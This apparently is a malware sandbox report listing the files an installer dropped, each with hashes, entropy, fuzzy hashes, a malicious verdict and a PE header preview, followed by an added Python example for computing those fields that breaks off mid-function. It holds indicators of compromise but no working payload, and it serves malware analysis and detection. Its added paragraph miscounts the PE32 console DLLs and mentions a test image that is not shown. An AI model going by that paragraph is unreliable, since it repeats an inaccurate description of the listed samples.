SHA-256:CC50A7B0DF5274317D1B6A030E3AC33815F1C9D3A0EF813FFEC405E5D844D420
SHA-512:99BFD19E88F38D9BA80BEEC4C31FECEF4C46657098809DADD3FFAC8A3325D59335CEF2BC195124AA8D3933A25A66EE99CB27C1CDB8990E9E0F54577847B486CD
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):63960
Entropy (8bit):5.985053093940967
Encrypted:false
SSDEEP:1536:UuH8cM6INO6I16K2pa2slcJCKKSg8gD7mN9f9xg8:UuM7NO6IOpa2ocJCSDgDe9E8
MD5:E1AD97477B7DCF44C45617AF1C5F42A7
SHA1:3C4EE0BDAEE0D2F5AA2FEC0B123941E4EF502A7B
SHA-256:715B44973C9999CE10DA2EAA29FA566CCFDFA6E013F839CD51BD8D54E470E1AF
SHA-512:355844A975DBACC5D205E5739C9A8ABA82C5E2A6B80A4EB0CECCC3BC4465A987440C65982A69D65547BD610D60457B835289C0ECC5609CD4EB62DAF9EB329B36
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):342928
Entropy (8bit):6.408348971375156
Encrypted:false
SSDEEP:6144:8DuvZXZ75Ao6oyIxeBUoy9g76HNfRAFohvLBIfI2X+xc:iuvZpao6SeImEN5AFol2FYc
MD5:0C58B720D674D0B45782406D5EDF19FB
SHA1:1878D63CD7CD7D7978C4FAC4249F9C1115B6859A
SHA-256:CA59E1B4FD0114BB5D92FA9F16F5BCCE9048C5AEFA74EAFCE2EDAB4E9BD86240
SHA-512:B9D65A127E53F706692EC15135EE35B682AED1F2349FEF889F29ACE8AE6004EA26CA259B10800DD254B6668535A662A20752BBC30116D44E3F4DBC7F8B87AF4A
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):569328
Entropy (8bit):6.367866718163481
Encrypted:false
SSDEEP:12288:HnZlvw+mZfMDFfRRLLUTF5xQFa3J5cbQ0:HnZlvw+mVmFfRRLLYFHQF
MD5:DD9FECBF34374972577A058E5A4C7C3D
SHA1:16C3114A75A2ECED0104428DC779A3DBDA951CC0
SHA-256:AD25C27BC99075B4883A9BF7943954094885798969038D46785E0FD1EC1CCBC2
SHA-512:8AEECA34B63930564D42056CA1B7D3C59D6FE017B19E86FB294FAFAB982A014B09BBC40F32A9CC5D36C8AFA13D7863BA4F144AB6A4AF465ACBC8A6A72F6D8554
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):103312
Entropy (8bit):5.979453656708724
Encrypted:false
SSDEEP:3072:gT97/RgBXe/h21E4Vu/OQyHQZiKrnESg9RRL:gT9REUqxVu/faQgKHqX
MD5:C0BDC27A46B7E062AD6F63B8451AAE13
SHA1:ADBDE2D4F487D8792BA134EBDD2D0A0F6EDCE743
SHA-256:C24C0D1191A1538206A49563FC57922022ED99829B1EBDD7891A06E234AFF20F
SHA-512:294704A2728039B1BDB367502963F36D102D154FE965A3373BDCCBB8B015DD8CF9BA9C1C57FBEC6667330F41D7DFDE64F6D9D11CBC8E4E26E826FBAEAE7BC0F1
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):131920
Entropy (8bit):6.0574531251583865
Encrypted:false
SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
MD5:F57FB935A9A76E151229F547C2204BBA
SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):347864
Entropy (8bit):6.514122855027409
Encrypted:false
SSDEEP:6144:nAQuAk+1NI9ZJ/ZCioG9EoE4ckAc2AOrWYcr67:nAQuAerFoG9hVMhLcr67
MD5:967ADECC4C7B3915E3D04BC05DA2F679
SHA1:3A12B1C7169B8FA839236F30F222A36D12EEE70E
SHA-256:96F9946C1ADE394B49533E765809DFE9258294C0277B89026F5FC11106FE7CA1
SHA-512:99D1E7B163A046138C784449BE389B175B28FD5026238982CEE561A0FF8F201D2123216D3F776E183F4C6E32FFB8ED46990AD12DE088C8EE7E01D39A6A4FBE0C
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):54824
Entropy (8bit):6.565299102080387
Encrypted:false
SSDEEP:768:IvYH6XbSX2iFeNlCERRLa0g7G/0+k3QSkVliAV6a7srzgUjFYicm0VNZoo:qXWFeNlCERRLa0gUEGQrz1jF7u1t
MD5:4E1D7DF7612E1EFB030592C5AE992BDE
SHA1:1DF24C667F581E49A7B3CB92DB6263B5039EB9CB
                                                                                                                                                                                                                                        SHA-256:48D91CD358E37D57E43A58C992B5454F2A249E924AC2A13293E4105C102608A7
                                                                                                                                                                                                                                        SHA-512:1CCA901DF70E3887A4CEEE6600E740D9B57E6573E793A87E501E813B8225FF8364EBAA1E0AE8AD2A69C8FFC691241CE643E02CAD152F92868F52A38AC8EAADCF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................R..........................................................>.........Rich............................PE..L...zQFd...........!.....n...>.......l...............................................:....@.............................p..............................(&..............T...........................X...@............................................text....m.......n.................. ..`.rdata..f(.......*...r..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):309136
                                                                                                                                                                                                                                        Entropy (8bit):6.409944760297986
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:6G4+kHMYKM3WoU+iWS7eTAJxCmR/3ZNm11favAgAEoY46SvpKJa/VEulQuM/XWC:62wzrLU+iWTAJBF3Z6iohXsJa9SDL
                                                                                                                                                                                                                                        MD5:354F7EAB1FC24A19FB0B053B95CF07C1
                                                                                                                                                                                                                                        SHA1:1FE5C1641DC3896D63ABECEFF56D8AB06AD1B070
                                                                                                                                                                                                                                        SHA-256:BE45B0711DF735088D8889D16BFE8E5C68E23C23D25A8C4B0236851F68FBA341
                                                                                                                                                                                                                                        SHA-512:5ACEE14479C422E3143E1F0B498C974D025DA368B4BF6EEDA7045B241A3639C9C552CF12CD35E09C071346C1A7F19D1FEDDAA01F2DF4CBB16EDA9F8847B860DE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .A...A...A...*...A...*...A...*..$A...4...A...4...A...4...A...*...A...A..8A..z4...A..z4...A..z4p..A..z4...A..Rich.A..........PE..d......b.........." .........................................................@............`.........................................@;..T....;..P.... ...........*......./...0..|.......p........................... ...8...............P............................text...(........................... ..`.rdata...6.......8..................@..@.data........P.......<..............@....pdata...*.......,...N..............@..@_RDATA...............z..............@..@.rsrc........ .......|..............@..@.reloc..|....0.......~..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):449496
                                                                                                                                                                                                                                        Entropy (8bit):6.177250619165656
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:uf907Z9VXtV5w8VR4SfoTP2GcG6kZBK7+:s90t97w8VoKGcG6cBKC
                                                                                                                                                                                                                                        MD5:75FB5858513B1A9C4555064196F2FFCF
                                                                                                                                                                                                                                        SHA1:0658EAEBCE3932274DCF9958B83E08A8C2EB9568
                                                                                                                                                                                                                                        SHA-256:988A1ED7B2125741C695103F532F99C9002FC14D6B3FCB6698CDF6AE4AA07BBE
                                                                                                                                                                                                                                        SHA-512:D318E1B3CAC29B287E24D029D240828E2B858AF97CEBBE0A329AA1DE83FF4509A127FA229BE83CA43AB22FEABFEDB54802DE18A22EAF8245A65A6120899A131C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......,P{.h1.Lh1.Lh1.LaI.L|1.L:D.M`1.L:D.ML1.L:D.Ma1.L:D.Ml1.L|Z.Mi1.L|Z.Ml1.L|Z.Mu1.Lh1.L.0.L.X.Ml1.L.D.M~1.L.D.Mi1.L.D.Li1.Lh1.Li1.L.D.Mi1.LRichh1.L................PE..d...O..f.........." .................`..............................................jD....`..........................................X.......Z..0................0.......)..............p.......................(.......8............................................text.............................. ..`.rdata.............................@..@.data................l..............@....pdata...0.......2...v..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):44008
                                                                                                                                                                                                                                        Entropy (8bit):6.658320283903974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:qR2/DB8xoPdian7MGXWYMvtWsjv7XqWD8R0kD:qR29pVrXWBQ6ThwSkD
                                                                                                                                                                                                                                        MD5:E62522E067AACF9E7A4FAF928BFC3965
                                                                                                                                                                                                                                        SHA1:676105C373BF128A5B5700FF1F52486FD01E72B7
                                                                                                                                                                                                                                        SHA-256:4C6BD47550FD0DEB7C29B95448CD35D40950CF12D3510E6C26C2E297574D1324
                                                                                                                                                                                                                                        SHA-512:043F94AD6D2DF3751B2557A5E6F44613091950CCFC2065109ABD3C800C1EB95DACB262CE4DA9E95D8CEFD8161D06AE6009D192A0D702BE663F44E36DDB5223BE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ *..AD.AD.AD."..AD..&E.AD.9..AD.AE.AD..&G.AD..&@.AD..&A.AD..&D.AD..&..AD..&F.AD.Rich.AD.................PE..d....(.].........." .....:...2.......A....................................................`A.........................................f......\g..x....................j...A...........^..8...........................P^...............P..X............................text...d9.......:.................. ..`.rdata..p....P.......>..............@..@.data........p.......\..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc...............h..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):295384
                                                                                                                                                                                                                                        Entropy (8bit):6.384644936740942
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:+7BS1ak5I0CHEdGGgap8VywsC75bgs03d3tKRc/uk8QRYQrjRj332RYLwYwacyHd:QS1jzCMqLXv7GsStGcGCROYwYmq
                                                                                                                                                                                                                                        MD5:8D108CADED0B235B77A6A6C6A0D904B8
                                                                                                                                                                                                                                        SHA1:5C278A09C335B61C06E4CCB32D91C151400500F5
                                                                                                                                                                                                                                        SHA-256:AB7DBBA829D07BE48C7E45141BF769C4FFEBE86A78F170FD3EDAEE6B63A9D1F1
                                                                                                                                                                                                                                        SHA-512:F63C14071B12A89A1678B9AB291FAD8628F8FB24BC16880DED83A9F94DA73061394DE8EA322ECE71745BFA3273CE98BA80A5F8EB16F591F2A25CE3934A23837F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'...'...'...|..-...|.."...|......u...)...u...-...u.......|.. ...'...Z.......!.......&.....u.&...'...&.......&...Rich'...................PE..d.....f.........." .........`......X...............................................+.....`.................................................X...<............`..."...X...)..............p.......................(.......8............ ...............................text............................... ..`.rdata....... ......................@..@.data...."...0......................@....pdata..."...`...$...$..............@..@_RDATA...............H..............@..@.rsrc................J..............@..@.reloc...............P..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):199128
                                                                                                                                                                                                                                        Entropy (8bit):5.77155775659446
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:SJ613DnPspO8dsZ4olHTfEVFU6Vuu0tzbCwzayDwVqSrgIN4fICGs7:SO8d6ljEV+6Vu/dWs
                                                                                                                                                                                                                                        MD5:A2E1203EFF93BF15342E88727FE5BE34
                                                                                                                                                                                                                                        SHA1:CD95E9F872584411F08B26666F35E142C743C050
                                                                                                                                                                                                                                        SHA-256:193790697CD9F9A90F924671294A80873FEF8636A2E0C6BA8D9A57B4F4434176
                                                                                                                                                                                                                                        SHA-512:1E6D4E8FE940952132308C904CD9052A5E1035BA502B679FFEF044BA654084962DD4A59FB66B7686FAF369CAEE315E33CDE333CE3E8B11E46CD843898FB2F08C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.F...........!......... ......~.... ........@.. ....................... ......sd......................................$...W........................)........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):321008
                                                                                                                                                                                                                                        Entropy (8bit):6.4037799339163355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:dtqkKC7BjQV5eR1b+yRWsJQnNfckNI+STEDC4nkml+T/6qhdDqvJbb9fv:HRFe5en+gWUCNTF9fv
                                                                                                                                                                                                                                        MD5:B1F29EA399C173C50C64FFCA5F13DC7F
                                                                                                                                                                                                                                        SHA1:4A039AFF59F34BAE66AA24A0C349059795BF13B2
                                                                                                                                                                                                                                        SHA-256:0E179470446A14C3706182D88FC95E5C066957C3752DEFDD6D3649AE877C87A2
                                                                                                                                                                                                                                        SHA-512:0B95E7209CDBB1E977860E8A41E73C5232E682EF111A34A57762FA6BC83D8C3126BCD38069E1D8FB72703F356608F98C103717377493D41E0F4EB5CAA024D79B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..{...{...{...r.w.s......y...o...y......m......s..............|...{...W.......n.......z.......z...{.s.z.......z...Rich{...................PE..d...2._.........." .....Z...v.......\..............................................X$....`..........................................6..........................0-..................H...T.......................(.......0............p..p............................text....X.......Z.................. ..`.rdata..4#...p...$...^..............@..@.data...8...........................@....pdata..0-..........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1340400
Entropy (8bit):6.41486755163134
Encrypted:false
SSDEEP:24576:eXPn73RXox1U9M0m+1ffSDY565RzHUY1iaRy95hdGehEM:+7hXU1U95m4ff9A5RviaRy9NGI
MD5:3569693D5BAE82854DE1D88F86C33184
SHA1:1A6084ACFD2AA4D32CEDFB7D9023F60EB14E1771
SHA-256:4EF341AE9302E793878020F0740B09B0F31CB380408A697F75C69FDBD20FC7A1
SHA-512:E5EFF4A79E1BDAE28A6CA0DA116245A9919023560750FC4A087CDCD0AB969C2F0EEEC63BBEC2CD5222D6824A01DD27D2A8E6684A48202EA733F9BB2FAB048B32
Malicious:false
Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........Yt..7'..7'..7'...'..7'..3&..7'}.3&..7'}.4&..7'}.2&..7'}.6&..7'..6&..7'0.6&..7'..6'c.7'0.2&2.7'0.7&..7'0..'..7'...'..7'0.5&..7'Rich..7'........................PE..d....._.........." .................................................................c....`......................................... ....n..,...h....................X..........,.......T...................p...(...@...0............................................text...C........................... ..`.rdata...g.......h..................@..@.data...XN...@...2... ..............@....pdata...............R..............@..@.rsrc................>..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):5498352
Entropy (8bit):6.619117060971844
Encrypted:false
SSDEEP:49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
MD5:4CD1F8FDCD617932DB131C3688845EA8
SHA1:B090ED884B07D2D98747141AEFD25590B8B254F9
SHA-256:3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
SHA-512:7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):216088
Entropy (8bit):6.062470753605543
Encrypted:false
SSDEEP:3072:1H7xfAIDlLQrrdfmexchURpf0fs07+OfCWnBceG6oHb3IxT:1H7xfAOuRfmqIURpsZflWeGRiT
MD5:131179112CEE5BD2686B52698F9097E4
SHA1:F7F14E534FDFEABDD040870EE85C2C5F0AC8DB3F
SHA-256:6D29C40A75CF16F065BF23E021008EECA94354645D0C07A9DB76E62B50637331
SHA-512:A197C6510E076CC8DF215F9DA1C64263CB816799DFE4A6F790AA567948414B9E0DFB3F9DB6BDC71DB793D2635847B11CCD06EBAE8CAC88E18DB76D51384BEB03
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,...h.Gh.Gh.G...Fb.G...Fm.G...F..G:..Fx.G:..F`.G...Fo.Gh.G..G:..FJ.G...Fl.G...Fi.G..]Gi.Gh.5Gi.G...Fi.GRichh.G................PE..d...hPrb.........." .........N......8........................................p......%.....`.................................................p...P....P.......0..D....(...$...`..`.......p...........................@................... ............................text............................... ..`.rdata..0...........................@..@.data...............................@....pdata..D....0......................@..@.rsrc........P......................@..@.reloc..`....`....... ..............@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):309200
Entropy (8bit):6.381648437918301
Encrypted:false
SSDEEP:3072:sIxDIeqfASLDvxzfWZUoZxl/6/n3gnWomXcuN7jRFYXLgq+NoY46zCvvJTOgzHwD:syYISHpzfWDZxl/6/3wmXu0zohJvxVz
MD5:328C1A160E77266A582AB5DCAB55DE1D
SHA1:547A24503AE5617E6423200D4B533E31F6B78842
SHA-256:63ED0307C683E5B89BC3694BA6C7E938D1D715E2CC7503B6E67264A929F545FC
SHA-512:7E8ACC623F58CD7C7BD574E008BDC946D493DCBAA87E26F9D9A46958E20FF96225C12B84318058A0676FBC73E26181EA533B600E10864F5600E5370E5084C2BA
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.m. ... ... ...4...*...4...3...4......r...j...r...0...r...*...4...+... .........&......!......!... ..!......!...Rich ...................PE..d...}..b.........." ......................................................................`.........................................PL..h....L..x...............<*.......)......0.......p...........................P...8............................................text............................... ..`.rdata...H.......J..................@..@.data...$(...`.......@..............@....pdata..<*.......,...R..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):358760
Entropy (8bit):6.422019035317325
Encrypted:false
SSDEEP:6144:bXxYSK5qJG+DnVj1+cyVf9pmrj9mUwlScRflohB5BC1IKWRtr:TKkM+DnV4cy99crEUIR9onD6WRd
MD5:B109529B212C9C19EFCB010940B43388
SHA1:FF3F223D5563051EF8E81A4D1BC8B1CA28EB6B13
SHA-256:4AE8ECE6F610DF4902152B13971B5B4E2D75BB48BA632EFA55A47633EB918089
SHA-512:CAC516DF8792158697A33484D4C14960874210A684C428D21EEE6E4AE57A8D3157F5C414B016630AC58701227BF16E9101D294A7F37F2A1842DDAA2EC64DD30E
Malicious:true
Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........<A..R...R...R...Q...R...W.V.R.......R..V...R..Q...R..W...R...T...R...V...R...S...R...S...R.T.[...R.T.R...R.T.....R.......R.T.P...R.Rich..R.................PE..d......d.........." .................:...............................................0....`.................................................@...x............P.../...J..h/.............p.......................(...P...8...............X............................text...>........................... ..`.rdata...k.......l..................@..@.data....1..........................@....pdata.../...P...0..................@..@_RDATA...............:..............@..@.rsrc................<..............@..@.reloc...............@..............@..B........................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):359824
Entropy (8bit):6.39968191694886
Encrypted:false
SSDEEP:6144:u13VpUk0KVRK/LO2rr08yimMjITFohPqCnhGYEuu7N:aVp50Ki/LWkmFTFoBByuu7N
MD5:A2C2C8A50E3F93AD1C2F44AC23FDDBD3
SHA1:F1F046F1ADC63FFB6E159AA161FE5CD947518AF3
SHA-256:FF7013391FFFE0FFDA72F1DBE0ABDD8E73F7F3F85F3B99EE0E860C9004331211
SHA-512:8FBC2A4C9C80218E8DF5D21550B2BE323DD981AAD5EAFBB2C75AF5047387CDEDE70D12BFD0D6DB6A7F411A816B61DFFA32E4C35A747A457CC03E8BDEC2B85A9E
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k.@.k.@.k.@...A.k.@...A.k.@...A.k.@...A.k.@...A.k.@...A.k.@...A.k.@...A.k.@.k.@9k.@k..A.k.@k..A.k.@k.;@.k.@k..A.k.@Rich.k.@................PE..d......b.........." ......................................................................`.............................................`...0...x............@...2...N.../......X.......p...........................0...8............................................text.............................. ..`.rdata...h.......j..................@..@.data....-..........................@....pdata...2...@...4..................@..@_RDATA...............>..............@..@.rsrc................@..............@..@.reloc..X............B..............@..B........................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2350592
Entropy (8bit):6.106633684964105
Encrypted:false
SSDEEP:24576:I25rYD7d34Ec02SHQrRfZ3WmRu0qTDykjMxjUa/kHEBsznkXtmYvZa:IKrYD+wkfYmMjMxjjriOoYE
MD5:08E8736B90940EA324B296EAA7B6A01F
SHA1:C515DE2C68DFF9EFD8925375031EA8C56F407BDB
SHA-256:6920721DE8A6FC15223DA059519576F8CCDA1F79502468AD171DFF0C721AAB9F
SHA-512:69DB9125D5208224128E448BB1EF848606BA0485539219230FB12244ED36FD24DF2BAFCDF42ABA0FD1A156DCAE6D609A60E832C87A2E935AF16228C6F73B83C9
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........U........................z............_......._......._..............._......._..........a...._......._......._........f......_......Rich............PE..L......f...........!...&.....p......4h.......................................@$...........@.........................p.#.h....B#.<....p#.......................#.......".8...........................(.".@............@#..............................text...Z........................... ..`.rdata...n.......p..................@..@.data...(/....#.......".............@....idata.......@#.......#.............@..@.00cfg.......`#...... #.............@..@.rsrc........p#......"#.............@..@.reloc........#......*#.............@..B................................................................................................................................................................................................

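The dropped-file records above carry, for every file the Inno Setup stub (5RLYIRN4B2NNKHJ11UTSZ2.tmp) wrote to disk, a fixed set of fields: size, 8-bit entropy, the four digests, an SSDEEP fuzzy hash and a file(1)-style "File Type" string derived from the PE headers (note the one PE32 x86 DLL with a console subsystem among the PE32+ GUI DLLs). The Python below is an added example, not Joe Sandbox's code, showing how those fields are derived from the raw bytes so the same values can be reproduced and compared outside the sandbox. It leaves out SSDEEP (which needs the ssdeep library) and the "Encrypted" flag (the report does not state the entropy threshold behind it). The PE image it analyses is constructed in-line for testing, and the machine/subsystem tables cover only the values that appear on this page.

```python
import hashlib
import math
import struct

# Field names mirror the dropped-file records in this Joe Sandbox report
# (MD5, SHA1, SHA-256, SHA-512, "Entropy (8bit)", "File Type"). This is an
# added illustration of how such values are computed, not the sandbox's code.

IMAGE_FILE_DLL = 0x2000                              # COFF Characteristics flag
MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64"}  # only the two machines seen on this page
SUBSYSTEMS = {2: "GUI", 3: "console"}                # IMAGE_SUBSYSTEM_WINDOWS_GUI / _CUI


def hashes(data: bytes) -> dict:
    """Digest set as printed in the report (upper-case hex)."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy over byte values, in bits per byte: 0.0 for constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_file_type(data: bytes) -> str:
    """Build the file(1)-style 'File Type' string from the DOS, COFF and optional headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, _, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                            # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]             # 0x10B = PE32, 0x20B = PE32+
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]    # Subsystem sits at +68 in both PE32 and PE32+
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)
    if fmt is None:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    kind = "(DLL) " if characteristics & IMAGE_FILE_DLL else ""  # file(1) omits a marker for plain EXEs
    arch = MACHINES.get(machine, f"machine {machine:#x}")
    sub = SUBSYSTEMS.get(subsystem, f"subsystem {subsystem}")
    return f"{fmt} executable {kind}({sub}) {arch}, for MS Windows"


def describe(data: bytes) -> dict:
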